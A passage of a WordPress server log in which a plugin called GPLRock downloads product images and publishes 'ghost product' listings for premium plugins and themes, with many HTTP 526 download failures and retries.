02:10:20 UTC] GPLRock: Image downloaded successfully for product yith-woocommerce-affiliates-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8dce98a3.jpg [05-Apr-2026 02:10:20 UTC] GPLRock: Using pre-downloaded image for product yith-woocommerce-affiliates-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8dce98a3.jpg [05-Apr-2026 02:10:20 UTC] GPLRock: Ghost product published with image - Product ID: yith-woocommerce-affiliates-premium [05-Apr-2026 02:10:22 UTC] GPLRock: Image downloaded successfully for product facetwp-advanced-filtering-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23434a34.jpg [05-Apr-2026 02:10:22 UTC] GPLRock: Using pre-downloaded image for product facetwp-advanced-filtering-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-23434a34.jpg [05-Apr-2026 02:10:22 UTC] GPLRock: Ghost product published with image - Product ID: facetwp-advanced-filtering-for-wordpress [05-Apr-2026 02:10:23 UTC] GPLRock: Image downloaded successfully for product woomail-woocommerce-email-customizer (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e38d5678.jpg [05-Apr-2026 02:10:23 UTC] GPLRock: Using pre-downloaded image for product woomail-woocommerce-email-customizer: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e38d5678.jpg [05-Apr-2026 02:10:23 UTC] GPLRock: Ghost product published with image - Product ID: woomail-woocommerce-email-customizer [05-Apr-2026 02:10:26 UTC] GPLRock: Image downloaded successfully for product woocommerce-social-login-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-151ac3ee.jpg [05-Apr-2026 02:10:26 UTC] GPLRock: Using pre-downloaded image for product woocommerce-social-login-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-151ac3ee.jpg [05-Apr-2026 02:10:26 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-social-login-wordpress-plugin [05-Apr-2026 02:10:27 UTC] GPLRock: Image downloaded successfully for product enfold-responsive-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cc57d25d.jpg [05-Apr-2026 02:10:27 UTC] GPLRock: Using pre-downloaded image for product enfold-responsive-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-cc57d25d.jpg [05-Apr-2026 02:10:27 UTC] GPLRock: Ghost product published with image - Product ID: enfold-responsive-multi-purpose-theme [05-Apr-2026 02:10:29 UTC] GPLRock: Image downloaded successfully for product salient-responsive-multi-purpose-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2c3bca8a.jpg [05-Apr-2026 02:10:29 UTC] GPLRock: Using pre-downloaded image for product salient-responsive-multi-purpose-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2c3bca8a.jpg [05-Apr-2026 02:10:29 UTC] GPLRock: Ghost product published with image - Product ID: salient-responsive-multi-purpose-theme [05-Apr-2026 02:10:30 UTC] GPLRock: Image downloaded successfully for product boombox-viral-magazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-93d9abde.jpg [05-Apr-2026 02:10:30 UTC] GPLRock: Using pre-downloaded image for product boombox-viral-magazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-93d9abde.jpg [05-Apr-2026 02:10:30 UTC] GPLRock: Ghost product published with image - Product ID: boombox-viral-magazine-wordpress-theme [05-Apr-2026 02:10:32 UTC] GPLRock: Image downloaded successfully for product woocommerce-delivery-area-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9e1e617.jpg [05-Apr-2026 02:10:32 UTC] GPLRock: Using pre-downloaded image for product woocommerce-delivery-area-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f9e1e617.jpg [05-Apr-2026 02:10:32 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-delivery-area-pro [05-Apr-2026 02:10:33 UTC] GPLRock: Image downloaded successfully for product searchwp-wordpress-plugin (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f950a611.jpg [05-Apr-2026 02:10:33 UTC] GPLRock: Using pre-downloaded image for product searchwp-wordpress-plugin: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-f950a611.jpg [05-Apr-2026 02:10:33 UTC] GPLRock: Ghost product published with image - Product ID: searchwp-wordpress-plugin [05-Apr-2026 02:12:17 UTC] GPLRock: Image download failed for product consult-expert-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:19 UTC] GPLRock: Image download failed for product consult-expert-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consult-expert---consulting-wordpress-theme-22653.webp for product consult-expert-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:21 UTC] GPLRock: Image download failed for product consult-expert-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:23 UTC] GPLRock: Image download failed for product consult-expert-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/consult-expert---consulting-wordpress-theme-22653.webp for product consult-expert-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:25 UTC] GPLRock WARNING: Image download failed for product consult-expert-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/consult-expert---consulting-wordpress-theme-22653.webp [05-Apr-2026 02:12:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: consult-expert-consulting-wordpress-theme [05-Apr-2026 02:12:25 UTC] GPLRock: Image downloaded successfully for product serenite-startup-saas-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4876adb1.webp [05-Apr-2026 02:12:25 UTC] GPLRock: Using pre-downloaded image for product serenite-startup-saas-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-4876adb1.webp [05-Apr-2026 02:12:25 UTC] GPLRock: Ghost product published with image - Product ID: serenite-startup-saas-wordpress-theme [05-Apr-2026 02:12:25 UTC] GPLRock: Image download failed for product margin-elementor-marketing-seo-rtl-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:27 UTC] GPLRock: Image download failed for product margin-elementor-marketing-seo-rtl-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/margin--elementor-marketing-seo-rtl-wordpress-theme-27128.webp for product margin-elementor-marketing-seo-rtl-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:30 UTC] GPLRock: Image download failed for product margin-elementor-marketing-seo-rtl-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:32 UTC] GPLRock: Image download failed for product margin-elementor-marketing-seo-rtl-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/margin--elementor-marketing-seo-rtl-wordpress-theme-27128.webp for product margin-elementor-marketing-seo-rtl-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:34 UTC] GPLRock WARNING: Image download failed for product margin-elementor-marketing-seo-rtl-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/margin--elementor-marketing-seo-rtl-wordpress-theme-27128.webp [05-Apr-2026 02:12:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: margin-elementor-marketing-seo-rtl-wordpress-theme [05-Apr-2026 02:12:34 UTC] GPLRock: Image download failed for product the-wavo-portfolio-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:36 UTC] GPLRock: Image download failed for product the-wavo-portfolio-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-wavo---portfolio-showcase-wordpress-theme-11383.webp for product the-wavo-portfolio-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:38 UTC] GPLRock: Image download failed for product the-wavo-portfolio-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:41 UTC] GPLRock: Image download failed for product the-wavo-portfolio-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-wavo---portfolio-showcase-wordpress-theme-11383.webp for product the-wavo-portfolio-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:43 UTC] GPLRock WARNING: Image download failed for product the-wavo-portfolio-showcase-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/the-wavo---portfolio-showcase-wordpress-theme-11383.webp [05-Apr-2026 02:12:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-wavo-portfolio-showcase-wordpress-theme [05-Apr-2026 02:12:43 UTC] GPLRock: Image download failed for product niqui-vape-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:45 UTC] GPLRock: Image download failed for product niqui-vape-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/niqui--vape-store-woocommerce-wordpress-theme-28755.webp for product niqui-vape-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:47 UTC] GPLRock: Image download failed for product niqui-vape-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:49 UTC] GPLRock: Image download failed for product niqui-vape-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/niqui--vape-store-woocommerce-wordpress-theme-28755.webp for product niqui-vape-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:51 UTC] GPLRock WARNING: Image download failed for product niqui-vape-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/niqui--vape-store-woocommerce-wordpress-theme-28755.webp [05-Apr-2026 02:12:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: niqui-vape-store-woocommerce-wordpress-theme [05-Apr-2026 02:12:51 UTC] GPLRock: Image download failed for product hospital-medical-doctor-wordpress-theme-hospital (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:54 UTC] GPLRock: Image download failed for product hospital-medical-doctor-wordpress-theme-hospital (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hospital-medical-doctor-wordpress-theme---hospital-19819.webp for product hospital-medical-doctor-wordpress-theme-hospital after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:12:56 UTC] GPLRock: Image download failed for product hospital-medical-doctor-wordpress-theme-hospital (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:12:58 UTC] GPLRock: Image download failed for product hospital-medical-doctor-wordpress-theme-hospital (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/hospital-medical-doctor-wordpress-theme---hospital-19819.webp for product hospital-medical-doctor-wordpress-theme-hospital after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:00 UTC] GPLRock WARNING: Image download failed for product hospital-medical-doctor-wordpress-theme-hospital. URL: https://meldwp.com/wp-content/uploads/hospital-medical-doctor-wordpress-theme---hospital-19819.webp [05-Apr-2026 02:13:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: hospital-medical-doctor-wordpress-theme-hospital [05-Apr-2026 02:13:00 UTC] GPLRock: Image download failed for product docmet-healthcare-and-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:02 UTC] GPLRock: Image download failed for product docmet-healthcare-and-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/docmet---healthcare-and-medical-wordpress-theme-23767.webp for product docmet-healthcare-and-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:04 UTC] GPLRock: Image download failed for product docmet-healthcare-and-medical-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:07 UTC] GPLRock: Image download failed for product docmet-healthcare-and-medical-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/docmet---healthcare-and-medical-wordpress-theme-23767.webp for product docmet-healthcare-and-medical-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:09 UTC] GPLRock WARNING: Image download failed for product docmet-healthcare-and-medical-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/docmet---healthcare-and-medical-wordpress-theme-23767.webp [05-Apr-2026 02:13:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: docmet-healthcare-and-medical-wordpress-theme [05-Apr-2026 02:13:09 UTC] GPLRock: Image download failed for product gourmet-restaurant-and-food-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:11 UTC] GPLRock: Image download failed for product gourmet-restaurant-and-food-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gourmet---restaurant-and-food-theme-25099.webp for product gourmet-restaurant-and-food-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:13 UTC] GPLRock: Image download failed for product gourmet-restaurant-and-food-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:15 UTC] GPLRock: Image download failed for product gourmet-restaurant-and-food-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gourmet---restaurant-and-food-theme-25099.webp for product gourmet-restaurant-and-food-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:17 UTC] GPLRock WARNING: Image download failed for product gourmet-restaurant-and-food-theme. URL: https://meldwp.com/wp-content/uploads/gourmet---restaurant-and-food-theme-25099.webp [05-Apr-2026 02:13:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gourmet-restaurant-and-food-theme [05-Apr-2026 02:13:17 UTC] GPLRock: Image download failed for product strnix-solar-and-green-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:20 UTC] GPLRock: Image download failed for product strnix-solar-and-green-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/strnix---solar-and-green-energy-wordpress-theme-15284.webp for product strnix-solar-and-green-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:22 UTC] GPLRock: Image download failed for product strnix-solar-and-green-energy-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:24 UTC] GPLRock: Image download failed for product strnix-solar-and-green-energy-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/strnix---solar-and-green-energy-wordpress-theme-15284.webp for product strnix-solar-and-green-energy-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:26 UTC] GPLRock WARNING: Image download failed for product strnix-solar-and-green-energy-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/strnix---solar-and-green-energy-wordpress-theme-15284.webp [05-Apr-2026 02:13:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: strnix-solar-and-green-energy-wordpress-theme [05-Apr-2026 02:13:26 UTC] GPLRock: Image download failed for product kezta-gutenberg-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:28 UTC] GPLRock: Image download failed for product kezta-gutenberg-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kezta---gutenberg-portfolio-wordpress-theme-21207.webp for product kezta-gutenberg-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:30 UTC] GPLRock: Image download failed for product kezta-gutenberg-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:32 UTC] GPLRock: Image download failed for product kezta-gutenberg-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:13:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kezta---gutenberg-portfolio-wordpress-theme-21207.webp for product kezta-gutenberg-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:13:35 UTC] GPLRock WARNING: Image download failed for product kezta-gutenberg-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kezta---gutenberg-portfolio-wordpress-theme-21207.webp [05-Apr-2026 02:13:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kezta-gutenberg-portfolio-wordpress-theme [05-Apr-2026 02:14:14 UTC] GPLRock: Image download failed for product woocommerce-flash-sales-increase-black-friday-cyber-monday-sales (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:16 UTC] GPLRock: Image download failed for product woocommerce-flash-sales-increase-black-friday-cyber-monday-sales (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-flash-sales---increase-black-friday--cyber-monday-sales-8822.webp for product woocommerce-flash-sales-increase-black-friday-cyber-monday-sales after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:18 UTC] GPLRock: Image download failed for product woocommerce-flash-sales-increase-black-friday-cyber-monday-sales (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:20 UTC] GPLRock: Image download failed for product woocommerce-flash-sales-increase-black-friday-cyber-monday-sales (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-flash-sales---increase-black-friday--cyber-monday-sales-8822.webp for product woocommerce-flash-sales-increase-black-friday-cyber-monday-sales after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:22 UTC] GPLRock WARNING: Image download failed for product woocommerce-flash-sales-increase-black-friday-cyber-monday-sales. URL: https://meldwp.com/wp-content/uploads/woocommerce-flash-sales---increase-black-friday--cyber-monday-sales-8822.webp [05-Apr-2026 02:14:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-flash-sales-increase-black-friday-cyber-monday-sales [05-Apr-2026 02:14:23 UTC] GPLRock: Image download failed for product infy-vcard-saas-digital-business-card-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:25 UTC] GPLRock: Image download failed for product infy-vcard-saas-digital-business-card-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infy-vcard-saas--digital-business-card-builder-15964.webp for product infy-vcard-saas-digital-business-card-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:27 UTC] GPLRock: Image download failed for product infy-vcard-saas-digital-business-card-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:29 UTC] GPLRock: Image download failed for product infy-vcard-saas-digital-business-card-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/infy-vcard-saas--digital-business-card-builder-15964.webp for product infy-vcard-saas-digital-business-card-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:31 UTC] GPLRock WARNING: Image download failed for product infy-vcard-saas-digital-business-card-builder. URL: https://meldwp.com/wp-content/uploads/infy-vcard-saas--digital-business-card-builder-15964.webp [05-Apr-2026 02:14:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: infy-vcard-saas-digital-business-card-builder [05-Apr-2026 02:14:31 UTC] GPLRock: Image downloaded successfully for product ht-menu-pro-wordpress-mega-menu-builder-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-401f2023.webp [05-Apr-2026 02:14:31 UTC] GPLRock: Using pre-downloaded image for product ht-menu-pro-wordpress-mega-menu-builder-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-401f2023.webp [05-Apr-2026 02:14:31 UTC] GPLRock: Ghost product published with image - Product ID: ht-menu-pro-wordpress-mega-menu-builder-for-elementor [05-Apr-2026 02:14:31 UTC] GPLRock: Image download failed for product master-carousel-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:34 UTC] GPLRock: Image download failed for product master-carousel-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/master-carousel-for-wpbakery-page-builder-10235.webp for product master-carousel-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:36 UTC] GPLRock: Image download failed for product master-carousel-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:38 UTC] GPLRock: Image download failed for product master-carousel-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/master-carousel-for-wpbakery-page-builder-10235.webp for product master-carousel-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:40 UTC] GPLRock WARNING: Image download failed for product master-carousel-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/master-carousel-for-wpbakery-page-builder-10235.webp [05-Apr-2026 02:14:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: master-carousel-for-wpbakery-page-builder [05-Apr-2026 02:14:40 UTC] GPLRock: Image download failed for product checkoutfi-finland-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:42 UTC] GPLRock: Image download failed for product checkoutfi-finland-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/checkoutfi-finland-payment-gateway-woocommerce-plugin-22819.webp for product checkoutfi-finland-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:45 UTC] GPLRock: Image download failed for product checkoutfi-finland-payment-gateway-woocommerce-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:47 UTC] GPLRock: Image download failed for product checkoutfi-finland-payment-gateway-woocommerce-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/checkoutfi-finland-payment-gateway-woocommerce-plugin-22819.webp for product checkoutfi-finland-payment-gateway-woocommerce-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:49 UTC] GPLRock WARNING: Image download failed for product checkoutfi-finland-payment-gateway-woocommerce-plugin. URL: https://meldwp.com/wp-content/uploads/checkoutfi-finland-payment-gateway-woocommerce-plugin-22819.webp [05-Apr-2026 02:14:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: checkoutfi-finland-payment-gateway-woocommerce-plugin [05-Apr-2026 02:14:49 UTC] GPLRock: Image download failed for product media-hovers-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:51 UTC] GPLRock: Image download failed for product media-hovers-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-hovers-wordpress-plugin-20765.webp for product media-hovers-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:53 UTC] GPLRock: Image download failed for product media-hovers-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:55 UTC] GPLRock: Image download failed for product media-hovers-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:14:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/media-hovers-wordpress-plugin-20765.webp for product media-hovers-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:14:57 UTC] GPLRock WARNING: Image download failed for product media-hovers-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/media-hovers-wordpress-plugin-20765.webp [05-Apr-2026 02:14:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: media-hovers-wordpress-plugin [05-Apr-2026 02:14:57 UTC] GPLRock: Image download failed for product pageloader-wordpress-preloader-and-progress-bar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:00 UTC] GPLRock: Image download failed for product pageloader-wordpress-preloader-and-progress-bar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pageloader-wordpress-preloader-and-progress-bar-24247.webp for product pageloader-wordpress-preloader-and-progress-bar after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:02 UTC] GPLRock: Image download failed for product pageloader-wordpress-preloader-and-progress-bar (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:04 UTC] GPLRock: Image download failed for product pageloader-wordpress-preloader-and-progress-bar (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pageloader-wordpress-preloader-and-progress-bar-24247.webp for product pageloader-wordpress-preloader-and-progress-bar after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:06 UTC] GPLRock WARNING: Image download failed for product pageloader-wordpress-preloader-and-progress-bar. URL: https://meldwp.com/wp-content/uploads/pageloader-wordpress-preloader-and-progress-bar-24247.webp [05-Apr-2026 02:15:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pageloader-wordpress-preloader-and-progress-bar [05-Apr-2026 02:15:06 UTC] GPLRock: Image download failed for product shop-shopping-cart-apis-modules-for-stock-manager-advance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:08 UTC] GPLRock: Image download failed for product shop-shopping-cart-apis-modules-for-stock-manager-advance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shop-shopping-cart--apis-modules-for-stock-manager-advance-20213.webp for product shop-shopping-cart-apis-modules-for-stock-manager-advance after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 02:15:10 UTC] GPLRock: Image download failed for product shop-shopping-cart-apis-modules-for-stock-manager-advance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:13 UTC] GPLRock: Image download failed for product shop-shopping-cart-apis-modules-for-stock-manager-advance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 02:15:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shop-shopping-cart--apis-modules-for-stock-manager-advance-20213.webp for product 